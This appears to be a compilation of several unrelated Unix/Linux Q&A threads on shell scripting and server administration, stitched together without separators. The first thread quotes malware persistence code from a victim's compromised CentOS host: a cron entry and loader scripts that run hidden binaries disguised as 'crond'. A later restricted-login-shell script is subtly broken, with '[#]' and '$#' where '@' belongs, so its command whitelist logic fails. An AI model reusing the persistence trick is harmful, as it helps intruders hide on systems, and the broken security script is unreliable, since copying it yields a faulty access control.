I am trying to figure out if my /var/spool/crontab/root is getting overwritten by a virus or malicious code:
I woke up this morning and my /var/spool/crontab/root file was empty, except for this line, which was not written by me:
* * * * * /usr/home/.bash_history/update > /dev/null 2>&1
I looked for this update file that is set to run, and this is what it contains:
#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null
That update file calls a file named run, which contains:
#!/bin/bash
ARCH=`uname -m`
HIDE="crond"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./run64
fi
Here are the full contents of that /usr/home directory, which I do not recognize:
I am running CentOS 6.8.
I think you've been hacked, possibly by someone using a downloadable rootkit. They're available to any moron with a modem, many of whom won't even know what to do with the system once they've successfully hacked in.
The safest thing you can do is re-install the OS from scratch, and this time employ much stronger passwords. (Sorry, "pa$$w0rd" doesn't cut it.) You might try just changing passwords and scouring the system for anything suspicious, but there's a good chance something was changed that you'll never recognize.
I had a system hacked once where they replaced the "ls", "ps", and who knows what other commands with substitutes that skipped over their meddling, making it much more difficult to be 100% certain we'd found and fixed all their changes.
After your re-install, look up how to convert the shadow hashing to use SHA512. The default hashing algorithm is stored in /etc/login.defs, and is probably MD5, not nearly strong enough these days. But even with a stronger hash, many weak passwords fall quickly to a brute force attack.
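A rough sketch of that change on CentOS 6 (double-check the flags against authconfig's man page before relying on them):
grep '^ENCRYPT_METHOD' /etc/login.defs       # current default hash
authconfig --test | grep -i hashing          # what authconfig reports
authconfig --passalgo=sha512 --update        # switch new password hashes to SHA-512
Existing password hashes stay as they are until each password is changed with passwd.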
While you're at it, you might as well get CentOS 6.9 which will include more security patches.
I have a bash script from which I want to access /dev/tty, but only when it's available.
When it's not available (in my case: when running my script in GitHub Actions) then when I try to access it I get /dev/tty: No such device or address, and I'm trying to detect that in advance to avoid the error and provide fallback behaviour instead.
To do so I need a bash test that can detect cleanly this case, and which will work reliably across platforms (i.e. not using the tty command, which has issues on Mac).
I'm currently using [[ -e "/dev/tty" ]] which doesn't work - it appears to return true even on GitHub Actions, where it seems that /dev/tty exists but accessing it will fail. What should I use instead?
After testing lots of promising but not quite perfect suggestions (see the other answers), I think I've found my own solution that exactly fits my needs:
if sh -c ": >/dev/tty" >/dev/null 2>/dev/null; then
# /dev/tty is available and usable
else
# /dev/tty is not available
fi
To explain:
: >/dev/tty does nothing (using the : bash built-in) and sends that empty output to /dev/tty, thereby checking that it exists and is writable, without actually producing any visible output. If this succeeds, we're good.
If we do that at the top level without a /dev/tty, bash itself produces a noisy error in our output, complaining about /dev/tty being unusable. This can't be redirected and silenced because it comes from bash itself, not the : command.
Wrapping that with sh -c "..." >/dev/null 2>/dev/null runs the test in a separate shell process with stdout and stderr discarded, and so silences all errors & warnings while still returning the overall exit code.
Suggestions for further improvements welcome. For reference, I'm testing this with setsid <command>, which seems to be a good simulation of the TTY-less environment I'm having trouble with.
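For example, a small wrapper version of the check (the has_tty name is just illustrative), which can be exercised under setsid to simulate the TTY-less case:
has_tty() {
sh -c ": >/dev/tty" >/dev/null 2>&1
}
if has_tty; then
echo "prompting on /dev/tty"
else
echo "no usable /dev/tty, using fallback"
fi
Running the script as setsid ./myscript.sh should take the fallback branch.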
Try this approach:
if test "$(ps -p "$$" -o tty=)" = "?"; then
echo "/dev/tty is not available."
else
echo "/dev/tty is available."
fi
Instead of spawning a new shell process to test whether /dev/tty can really be opened (test -w lies, you know?), you can try to open /dev/tty from a subshell like so:
if (exec < /dev/tty) ; then
# /dev/tty is available
else
# no tty is available
fi
This is POSIX syntax and should work in any shell.
It seems that adapting this answer from this question on ServerFault (entitled How can I check in bash if a shell is running in interactive mode?, which is close to your question albeit not an exact duplicate) could be a solution for your use case.
So, could you try writing either:
[ -t 0 ] && [ -t 1 ] && echo your code
or [ -t 0 ] && echo your code ?
For completeness, here is one link documenting this POSIX flag -t, which is thus portable:
https://pubs.opengroup.org/onlinepubs/9699919799/utilities/test.html
-t file_descriptor
True if file descriptor number file_descriptor is open and is associated with a terminal.
False if file_descriptor is not a valid file descriptor number, or if file descriptor number file_descriptor is not open, or if it is open but is not associated with a terminal.
Furthermore, if you use bash (not just a POSIX-compliant shell), you might want to combine this idea with the special 255 file descriptor number: [ -t 255 ].
Source, on Unix & Linux SE:
That 255 file descriptor is an open handle to the controlling tty and is only used when bash is run in interactive mode.
[…]
− In Bash, what is file descriptor 255 for, can I use it? (by @mosvy)
Beyond the other answers mentioned in this thread (and as an alternative to the other idea involving $-, which did not seem to work for you), what about this other idea mentioned in the bash manual?
if [ -z "$PS1" ]; then
echo This shell is not interactive
else
echo This shell is interactive
fi
What is the best way to write a shell script that will access files relative to it such that it doesn't matter where I call it from? "Easy" means the easiest/recommended way that will work across different systems/shells.
Example
Say I have a folder ~/MyProject with subfolders scripts/ and files/. In scripts/, I have a shell script foo.sh that wants to access files in files/:
if [ -f "../files/somefile.ext" ]; then
echo "File found"
else
echo "File not found"
fi
It'll work fine if I do cd ~/MyProject/scripts && ./foo.sh, but it will fail with cd ~/MyProject && scripts/foo.sh.
You can usually do:
mydir="$(dirname $0)"
to get the directory of the running script.
Then just use that to locate your files.
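For example, a minimal sketch using the layout from the question (the relative files/ path is assumed from the example above):
mydir="$(dirname -- "$0")"
if [ -f "$mydir/../files/somefile.ext" ]; then
echo "File found"
else
echo "File not found"
fi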
Make all paths absolute.
Use environment variables when possible, for example $HOME.
You are running into a weakness of UNIX scripting.
Using a .profile or .bash_profile, your developers could set a bunch of ENV variables. Then your scripts could make use of those variables.
In one of the places I worked, you could run a script, that would prompt you for which version you wanted to look at, and set the ENVs such that developer interaction was pretty seamless.
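A rough sketch of that idea, reusing the directories from the question (the variable name PROJ_ROOT is made up):
# in each developer's ~/.bash_profile
export PROJ_ROOT="$HOME/MyProject"
# in scripts/foo.sh
if [ -f "$PROJ_ROOT/files/somefile.ext" ]; then
echo "File found"
fi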
Not sure if it's easy enough for you but this could give you a solution:
Shell Script Loader
if [ -f "../files/somefile.ext"]
then
echo "file was found"
else
echo "file was not found"
fi
And a second variant, testing for a missing file:
if [ ! -f /tmp/foo.txt ]; then
echo "File not found!"
fi
Unfortunately there doesn't seem to be a truly generic solution. My personal recommendation (and practice) is to write only for shells that provide consistent access to this--recent ksh93's ${.sh.file}, bash's $BASH_SOURCE, etc. (I don't know the zsh solution, but I'm sure there is one.)
Beyond that, the best solution is to avoid the problem in some way; e.g., for your example of a script in a git repository, you could require that the script be called from the directory it's in. After validating that by checking [[ -e myscript ]], you can then expect that relative links will work as expected. (Yes, for full robustness, you'll need to hardcode the basename of the script into the test, for the same reason this problem exists in the first place: the script's own path isn't reliably available to the shell in all conceivable circumstances.)
Considering that $0 should contain the path to the executed script, you can simply cd to its directory and then proceed normally.
So you simply do
scriptDir=$(dirname -- "$0")
cd -- "$scriptDir"
But that is still a hack; you should probably think of a way to work with absolute paths instead.
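If you'd rather not change the working directory, a common variant (assuming the script is executed, not sourced) resolves an absolute directory once and uses it explicitly:
scriptDir=$(cd -- "$(dirname -- "$0")" && pwd)
cat "$scriptDir/../files/somefile.ext"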
I was thinking about running commands at system start as a regular user. Currently, to do so, I use a syntax like this:
su -c 'command with some arguments' user
But I was thinking that it might be beneficial to have a per-user rc.local file at ~/.rc.local that would automatically get run as the user at startup. The code I came up for it is like this:
awk -F":" '{ if ($3 >= 1000) print $1, $6 }' /etc/passwd | while read u h
do
[ -x "$h/.rc.local" ] && su -c "cd $h; ./.rc.local" $u
done
This would be added to /etc/rc.local. It searches the home directory of every non-system user (i.e., a UID >= 1000), and if the file exists and is executable, it cd's to the user's home directory and executes the script as that user.
To me, this seems to eliminate any source of security risk, since it would be executing the script as the user, rather than root, but I've recently been reminded of my lack of security knowledge, so I present this question: is this a bad idea?
Right now, I'd only be running this on my home computer, and my home computer only has one non-system user. A few years down the road, my daughter may get her own account on the computer, but besides that, it's not like complete strangers will have access to this in any way.
So, is there any potential security hole that I'm overlooking? Also, is there a more elegant way to write that command?
This overlaps with the @reboot capability of per-user crontabs.
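For comparison, the cron equivalent is one line that each user adds with crontab -e (assuming ~/.rc.local exists and is executable):
@reboot "$HOME/.rc.local"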
I feel silly asking this...
I am not an expert on shell scripting, but I am finally in enough of a sysadmin role that I want to do this correctly.
I have a production server that hosts a webapp. Here is my routine.
1 - ssh to server
2 - cd django_src/django_apps/team_proj
3 - svn update
4 - sudo /etc/init.d/apache2 restart
5 - logout
I want to create a shell script for steps 2,3,4.
I can do this, but it will be a very plain and simple bash script simply containing the actual commands I type at the command line.
My question: What is the best way to script this kind of repetitive procedure in bash (Linux, Ubuntu) for a remote server?
Thanks!
The best way is simply as you suggest. Some things you should do for your script would be:
Put set -e at the top of the script (after the shebang). This will cause your script to stop if any of the commands fail, so if it cannot cd to the directory, it will not run svn update or restart Apache. You can get the same effect by putting || exit 1 after each command, but if that's all you're doing, you may as well use set -e.
Use full paths in your script. Do not assume the directory that the script is run from. In this specific case, the cd command has a relative path. Use a full (absolute) path, or use an environment variable like $HOME.
You may want to set up sudo so that it can run the command without asking for a password. This makes your script non-interactive which means it can be run in the background and from cron jobs and such.
As time goes by, you may add features and take command line arguments to parameterise the script. But don't bother doing this up front. Just evolve your scripts as you need.
There is nothing wrong with a simple bash script simply containing the actual commands you type at the command line. Don't make it more complicated than necessary.
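Putting that advice together, a minimal sketch might look like this (the project path mirrors the question; the sudoers line is optional and must be added with visudo):
#!/bin/bash
set -e
cd "$HOME/django_src/django_apps/team_proj"
svn update
sudo /etc/init.d/apache2 restart
# Optional, in /etc/sudoers (via visudo), to avoid the password prompt:
#   youruser ALL = NOPASSWD: /etc/init.d/apache2 restart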
I'd setup a cron job doing that automatically.
Since you're using Python, check out Fabric - you can use it to automate these kinds of tasks. First install Fabric:
$ sudo easy_install fabric
then write your fabric script:
from __future__ import with_statement
from fabric.api import *
def svnupdate():
with cd('django_src/django_apps/team_proj'):
run('svn update')
sudo('/etc/init.d/apache2 restart')
Save as fabfile.py, then run using the fab command:
$ fab -H hostname svnupdate
Tell me that's not cool! :-)
You can do this with the shell (bash, ksh, or zsh, plus ssh and the usual tools), or with a programming language such as Python, Perl, Ruby, PHP, or Java; basically anything that supports the SSH protocol and operating-system functions. The "best" one is the one you are most comfortable with and most knowledgeable about. If you are doing sysadmin work, the shell is the closest thing you can use. Once your script is done, you can use crontab (cron) or the at command to schedule the task; check their man pages for more information.
You can easily do the above using bash/Bourne etc.
However I would take the time and effort to learn Perl (or some similarly powerful scripting language). Why?
the language constructs are much more powerful
there are no end of libraries to interface to the systems/features you want to script
because of the library support, you won't have to spawn off different commands to achieve what you want (possibly valuable on a loaded system)
you can decompose frequently-used scripts into your own libraries for later use
I chose Perl in particular because it's been designed (perhaps "designed" is too strong a word for Perl) for these sorts of tasks. However, you may want to check out Ruby/Python or other suggestions from SO contributors.
For the basic steps, look at camh's answer. If you plan to run the script via cron, then implement some simple logging, e.g. by appending the start time and exit code of each command to a text file that you can later analyze for failures.
Expect -- scripting interactive applications
Expect is a tool for automating interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, etc.... Expect can make easy all sorts of tasks that are prohibitively difficult with anything else. You will find that Expect is an absolutely invaluable tool - using it, you will be able to automate tasks that you've never even thought of before - and you'll be able to do this automation quickly and easily.
http://expect.nist.gov
bonus: Your tax dollars at work!
I would probably do something like this...
project_update.sh
#!/bin/bash
#
# $1 - user@host
# $2 - project directory
[[ -z $1 || -z $2 ]] && { echo "usage: $(basename $0) user@host project_dir"; exit 1; }
declare host=$1 proj_dir=$2
ssh $host "cd $proj_dir;svn update;sudo /etc/init.d/apache2 restart" && echo "Success"
Just to add another tip - you should not give users access to some application in an unknown state. svn up might break during the update, users might see a page that's half-new half-old, etc. If you're deploying the whole application at once, I'd suggest doing svn export instead to a new directory and then either mv current old ; mv new current, or even keeping current as a link to the directory you're using now. Still not perfect and not blocking every possible race condition, but it definitely takes less time than svn up on the live copy.
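A rough sketch of that approach (the repository URL and paths are placeholders):
svn export "$REPO_URL" /srv/app/release-new   # clean copy, no .svn metadata
mv /srv/app/current /srv/app/release-old
mv /srv/app/release-new /srv/app/current
# or, if "current" is a symlink, swap it in one step:
# ln -sfn /srv/app/release-new /srv/app/current
sudo /etc/init.d/apache2 restart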
This is an idea about security. Our employees should have access to some commands on a Linux server, but not all of them. They should, e.g., be able to view a log file (less logfile) or start certain commands (shutdown.sh / run.sh).
Background information:
All employees access the server with the same user name: our product runs with "normal" user permissions, so no "installation" is needed; you just unzip it in your user directory and run it. We manage several servers where our application is "installed". On every machine there is a user johndoe. Our employees sometimes need command-line access to the application to check log files or to restart it by hand. Only some people should have full command-line access.
We are using public-key (.ppk) authentication on the server.
It would be great if employee1 can only access the logfile and employee2 can also do X etc...
Solution:
As a solution I'll use the command option as stated in the accepted answer. I'll make my own little shell script that will be the only file that can be executed for some employees. The script offers several commands that can be executed, but no others. I'll use the following options in authorized_keys, as described here:
command="/bin/myscript.sh",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty
ssh-dss AAAAB3....o9M9qz4xqGCqGXoJw= user@host
This is enough security for us. Thanks, community!
You can also restrict keys to permissible commands (in the authorized_keys file).
I.e. the user would not log in via ssh and then have a restricted set of commands but rather would only be allowed to execute those commands via ssh (e.g. "ssh somehost bin/showlogfile")
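If the key should be allowed a small set of commands rather than exactly one, note that sshd exposes whatever the client asked to run in the SSH_ORIGINAL_COMMAND environment variable, so the script named in command="..." can dispatch on it. A sketch (the wrapper path and the allowed commands are only examples):
#!/bin/sh
# referenced as command="/usr/local/bin/ssh-wrapper.sh" in authorized_keys
case "$SSH_ORIGINAL_COMMAND" in
"bin/showlogfile")
exec bin/showlogfile ;;
"tail -n 100 /home/johndoe/logs/app.log")
exec tail -n 100 /home/johndoe/logs/app.log ;;
*)
echo "command not allowed" >&2
exit 1 ;;
esac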
ssh follows the rsh tradition by using the user's shell program from the password file to execute commands.
This means that we can solve this without involving ssh configuration in any way.
If you don't want the user to be able to have shell access, then simply replace that user's shell with a script. If you look in /etc/passwd you will see that there is a field which assigns a shell command interpreter to each user. The script is used as the shell both for their interactive login ssh user@host as well as for commands ssh user@host command arg ....
Here is an example. I created a user foo whose shell is a script. The script prints the message my arguments are: followed by its arguments (each on a separate line and in angle brackets) and terminates. In the log in case, there are no arguments. Here is what happens:
webserver:~# ssh foo@localhost
foo@localhost's password:
Linux webserver [ snip ]
[ snip ]
my arguments are:
Connection to localhost closed.
If the user tries to run a command, it looks like this:
webserver:~# ssh foo@localhost cat /etc/passwd
foo@localhost's password:
my arguments are:
<-c>
<cat /etc/passwd>
Our "shell" receives a -c style invocation, with the entire command as one argument, just the same way that /bin/sh would receive it.
So as you can see, what we can do now is develop the script further so that it recognizes the case when it has been invoked with a -c argument, and then parses the string (say by pattern matching). Those strings which are allowed can be passed to the real shell by recursively invoking /bin/bash -c <string>. The reject case can print an error message and terminate (including the case when -c is missing).
You have to be careful how you write this. I recommend writing only positive matches which allow only very specific things, and disallow everything else.
Note: if you are root, you can still log into this account by overriding the shell in the su command, like this su -s /bin/bash foo. (Substitute shell of choice.) Non-root cannot do this.
Here is an example script: restrict the user into only using ssh for git access to repositories under /git.
#!/bin/sh
if [ $# -ne 2 ] || [ "$1" != "-c" ] ; then
printf "interactive login not permitted\n"
exit 1
fi
set -- $2
if [ $# != 2 ] ; then
printf "wrong number of arguments\n"
exit 1
fi
case "$1" in
( git-upload-pack | git-receive-pack )
;; # continue execution
( * )
printf "command not allowed\n"
exit 1
;;
esac
# Canonicalize the path name: we don't want escape out of
# git via ../ path components.
gitpath=$(readlink -f "$2") # GNU Coreutils specific
case "$gitpath" in
( /git/* )
;; # continue execution
( * )
printf "access denied outside of /git\n"
exit 1
;;
esac
if ! [ -e "$gitpath" ] ; then
printf "that git repo doesn't exist\n"
exit 1
fi
"$1" "$gitpath"
Of course, we are trusting that these Git programs git-upload-pack and git-receive-pack don't have holes or escape hatches that will give users access to the system.
That is inherent in this kind of restriction scheme. The user is authenticated to execute code in a certain security domain, and we are kludging in a restriction to limit that domain to a subdomain. For instance if you allow a user to run the vim command on a specific file to edit it, the user can just get a shell with :!sh[Enter].
What you are looking for is called a restricted shell. Bash provides such a mode (rbash, or bash -r) in which users cannot change directories, modify PATH, or run commands whose names contain a slash, which might be good enough for you.
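A minimal sketch of setting that up (the user name and directory are illustrative; the important part is that the user must not be able to edit their own PATH or profile):
ln -s /bin/bash /bin/rbash        # many distros already ship rbash
usermod -s /bin/rbash employee1   # make it the login shell
# In /home/employee1/.bash_profile (owned by root, not writable by the user):
#   PATH=/home/employee1/bin
#   export PATH
# Then place symlinks to the few permitted commands in /home/employee1/bin.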
I've found this thread to be very illustrative, if a bit dated.
Why don't you write your own login-shell? It would be quite simple to use Bash for this, but you can use any language.
Example in Bash
Use your favorite editor to create the file /root/rbash.sh (this can be any name or path, but should be chown root:root and chmod 700):
#!/bin/bash
commands=("man" "pwd" "ls" "whoami")
timestamp(){ date +'%Y-%m-%d %H:%M:%S'; }
log(){ echo -e "$(timestamp)\t$1\t$(whoami)\t$2" >> /var/log/rbash.log; }
trycmd()
{
ln="$1" # the command line to check is passed in as the first argument
# Provide an option to exit the shell
if [[ "$ln" == "exit" ]] || [[ "$ln" == "q" ]]
then
exit
# You can do exact string matching for some alias:
elif [[ "$ln" == "help" ]]
then
echo "Type exit or q to quit."
echo "Commands you can use:"
echo " help"
echo " echo"
echo "${commands[#]}" | tr ' ' '\n' | awk '{print " " $0}'
# You can use custom regular expression matching:
elif [[ "$ln" =~ ^echo\ .*$ ]]
then
ln="${ln:5}"
echo "$ln" # Beware, these double quotes are important to prevent malicious injection
# For example, optionally you can log this command
log COMMAND "echo $ln"
# Or you could even check an array of commands:
else
ok=false
for cmd in "${commands[#]}"
do
if [[ "$cmd" == "$ln" ]]
then
ok=true
fi
done
if $ok
then
$ln
else
log DENIED "$ln"
fi
fi
}
# Optionally show a friendly welcome-message with instructions since it is a custom shell
echo "$(timestamp) Welcome, $(whoami). Type 'help' for information."
# Optionally log the login
log LOGIN "$@"
# Optionally log the logout
trap "trap=\"\";log LOGOUT;exit" EXIT
# Optionally check for '-c custom_command' arguments passed directly to shell
# Then you can also use ssh user@host custom_command, which will execute /root/rbash.sh
if [[ "$1" == "-c" ]]
then
shift
trycmd "$#"
else
while echo -n "> " && read ln
do
trycmd "$ln"
done
fi
All you have to do is set this executable as your login shell. For example, edit your /etc/passwd file and replace that user's current login shell (/bin/bash) with /root/rbash.sh.
This is just a simple example, but you can make it as advanced as you want; the idea is there. Be careful not to lock yourself out by changing the login shell of your own (and only) user. And always test weird symbols and commands to see if it is actually secure.
You can test it with: su -s /root/rbash.sh.
Beware, make sure to match the whole command, and be careful with wildcards! Better exclude Bash-symbols such as ;, &, &&, ||, $, and backticks to be sure.
Depending on the freedom you give the user, it won't get much safer than this. I've found that often I only needed to make a user that has access to only a few relevant commands, and in that case this is really the better solution.
However, if you wish to give more freedom, a jail and permissions might be more appropriate. Mistakes are easily made, and often only noticed when it's already too late.
You should acquire `rssh', the restricted shell
You can follow the restriction guides mentioned above; they're all rather self-explanatory and simple to follow. Understand the term `chroot jail', and how to effectively implement sshd/terminal configurations, and so on.
Since most of your users access your terminals via sshd, you should also probably look into sshd_config, the SSH daemon configuration file, to apply certain restrictions via SSH. Be careful, however: understand properly what you are trying to implement, for the ramifications of incorrect configurations are probably rather dire.
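For instance, a Match block in sshd_config can pin a user to a single command and disable forwarding (a sketch only; adjust the names and reload sshd afterwards):
Match User johndoe
ForceCommand /bin/myscript.sh
X11Forwarding no
AllowTcpForwarding no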
GNU Rush may be the most flexible and secure way to accomplish this:
GNU Rush is a Restricted User Shell, designed for sites that provide limited remote access to their resources, such as svn or git repositories, scp, or the like. Using a sophisticated configuration file, GNU Rush gives you complete control over the command lines that users execute, as well as over the usage of system resources, such as virtual memory, CPU time, etc.
You might want to look at setting up a jail.
[Disclosure: I wrote sshdo which is described below]
If you want the login to be interactive then setting up a restricted shell is probably the right answer. But if there is an actual set of commands that you want to allow (and nothing else) and it's ok for these commands to be executed individually via ssh (e.g. ssh user@host cmd arg blah blah), then a generic command whitelisting control for ssh might be what you need. This is useful when the commands are scripted somehow at the client end and doesn't require the user to actually type in the ssh command.
There's a program called sshdo for doing this. It controls which commands may be executed via incoming ssh connections. It's available for download at:
http://raf.org/sshdo/ (read manual pages here)
https://github.com/raforg/sshdo/
It has a training mode to allow all commands that are attempted, and a --learn option to produce the configuration needed to allow learned commands permanently. Then training mode can be turned off and any other commands will not be executed.
It also has an --unlearn option to stop allowing commands that are no longer in use so as to maintain strict least privilege as requirements change over time.
It is very fussy about what it allows. It won't allow a command with any arguments. Only complete shell commands can be allowed.
But it does support simple patterns to represent similar commands that vary only in the digits that appear on the command line (e.g. sequence numbers or date/time stamps).
It's like a firewall or whitelisting control for ssh commands.
And it supports different commands being allowed for different users.
Another way of looking at this is to use POSIX ACLs. They need to be supported by your file system, but they give you fine-grained control over commands and files on Linux, much like the control you have on Windows (just without the nicer UI).
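A small sketch of what that looks like with the acl tools (user names and paths are just examples):
setfacl -m u:employee1:r-- /home/johndoe/logs/app.log   # employee1 may read the log
setfacl -m u:employee2:r-x /home/johndoe/run.sh         # employee2 may read and execute the script
getfacl /home/johndoe/run.sh                            # inspect the resulting ACL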
Another thing to look into is PolicyKit.
You'll have to do quite a bit of googling to get everything working as this is definitely not a strength of Linux at the moment.